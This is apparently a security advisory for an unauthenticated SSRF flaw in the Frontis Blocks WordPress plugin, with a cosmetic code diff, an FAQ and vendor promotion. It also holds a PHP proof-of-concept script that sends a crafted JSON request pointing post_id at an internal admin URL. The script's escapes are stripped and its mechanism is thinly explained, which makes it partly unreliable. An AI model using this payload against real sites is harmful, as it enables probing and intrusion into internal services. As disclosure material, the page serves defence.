-							$out_value = fb_get_plain_text( get_the_title( $thumb_id ) ) ?: __( 'No Content', 'frontis-blocks' );
+							$out_value = fb_get_plain_text(get_the_title($thumb_id)) ?: __('No Content', 'frontis-blocks');
 							break;
 						case 'alt':
-							$out_value = fb_get_plain_text( get_post_meta( $thumb_id, '_wp_attachment_image_alt', true ) ) ?: __( 'No Content', 'frontis-blocks' );
+							$out_value = fb_get_plain_text(get_post_meta($thumb_id, '_wp_attachment_image_alt', true)) ?: __('No Content', 'frontis-blocks');
 							break;
 						case 'caption':
-							$out_value = fb_get_plain_text( wp_get_attachment_caption( $thumb_id ) ) ?: __( 'No Content', 'frontis-blocks' );
+							$out_value = fb_get_plain_text(wp_get_attachment_caption($thumb_id)) ?: __('No Content', 'frontis-blocks');
 							break;
 						case 'description': {
-							$att = get_post( $thumb_id );
-							$out_value = fb_get_plain_text( $att ? $att->post_content : '' ) ?: __( 'No Content', 'frontis-blocks' );
+							$att = get_post($thumb_id);
+							$out_value = fb_get_plain_text($att ? $att->post_content : '') ?: __('No Content', 'frontis-blocks');
 							break;
 						}
 						case 'attachment_url':
 						default:
-							$out_value = wp_get_attachment_url( $thumb_id ) ?: __( 'No Content', 'frontis-blocks' );
+							$out_value = wp_get_attachment_url($thumb_id) ?: __('No Content', 'frontis-blocks');
 							break;
 					}
 					break;

 				case 'post_date':
-					$raw = ($date_type === 'modified') ? get_post_modified_time( 'U', true, $_post ) : get_post_time( 'U', true, $_post );
-					if ( ! $raw ) { $out_value = __( 'No Content', 'frontis-blocks' ); break; }
-					switch ( $date_format ) {
+					$raw = ($date_type === 'modified') ? get_post_modified_time('U', true, $_post) : get_post_time('U', true, $_post);
+					if (!$raw) {
+						$out_value = __

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68030 - Frontis Blocks <= 1.1.5 - Unauthenticated Server-Side Request Forgery

<?php

$target_url = 'http://vulnerable-wordpress-site.com';

// Exploit the dynamic content endpoint
$exploit_url = $target_url . '/wp-json/frontis-blocks/v1/dynamic-content';

// Payload to trigger SSRF via post_thumbnail field
$payload = array(
    'enabled' => true,
    'source' => 'post_type',
    'field' => 'post_thumbnail',
    'post_id' => 'http://internal-service.local:8080/admin', // SSRF target
    'featured_image_field' => 'attachment_url'
);

// Convert payload to JSON
$json_payload = json_encode($payload);

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $json_payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Content-Length: ' . strlen($json_payload)
));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo "cURL Error: " . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
    
    // Parse response for SSRF results
    $response_data = json_decode($response, true);
    if (isset($response_data['value'])) {
        echo "SSRF Result: " . $response_data['value'] . "n";
    }
}

// Close cURL session
curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-68030?
Understanding the vulnerability
CVE-2025-68030 is a medium-severity vulnerability affecting the Frontis Blocks plugin for WordPress, specifically versions up to and including 1.1.5. It allows unauthenticated attackers to exploit a Server-Side Request Forgery (SSRF) flaw, enabling them to make arbitrary web requests from the vulnerable WordPress installation.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from improper input validation in the `fb_compute_dynamic_text` function. Attackers can manipulate parameters sent to the WordPress REST API endpoint to make requests to internal services, potentially exposing sensitive information or allowing further attacks.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Frontis Blocks plugin version 1.1.5 or earlier is affected. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.
How can I check if my site is vulnerable?
Version verification steps
To determine if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Frontis Blocks plugin and verify if the version is 1.1.5 or earlier.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 1.1.6 of the Frontis Blocks plugin. Administrators should update to this version or later to mitigate the risk associated with this vulnerability.
What if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the Frontis Blocks plugin until a patch can be applied. Additionally, restrict access to the WordPress REST API to trusted users only.
What does the CVSS score of 6.5 mean?
Interpreting the severity rating
A CVSS score of 6.5 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly. It may lead to information disclosure or further attacks if exploited.
What are the practical risks of this vulnerability?
Potential impacts on security
Successful exploitation of this vulnerability could allow attackers to access internal services, leading to information disclosure or enabling further attacks on internal applications. This could compromise sensitive data or system integrity.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can send a specially crafted JSON payload to the vulnerable endpoint, manipulating the `post_id` parameter to point to an internal service. This effectively demonstrates the SSRF attack vector.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
To enhance security, regularly update all plugins and themes, use security plugins to monitor vulnerabilities, and implement firewall rules to restrict access to sensitive endpoints. Conduct regular security audits to identify and mitigate risks.
What is the dynamic content endpoint?
Endpoint details
The dynamic content endpoint is part of the Frontis Blocks plugin and is accessed via the WordPress REST API at `/wp-json/frontis-blocks/v1/dynamic-content`. This endpoint is where the vulnerability is exploited by sending malicious requests.
What should I do if I suspect my site has been compromised?
Response steps
If you suspect that your site has been compromised, immediately take it offline, conduct a thorough security audit, check for unauthorized access, and restore from a clean backup if necessary. Additionally, inform your hosting provider for further assistance.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations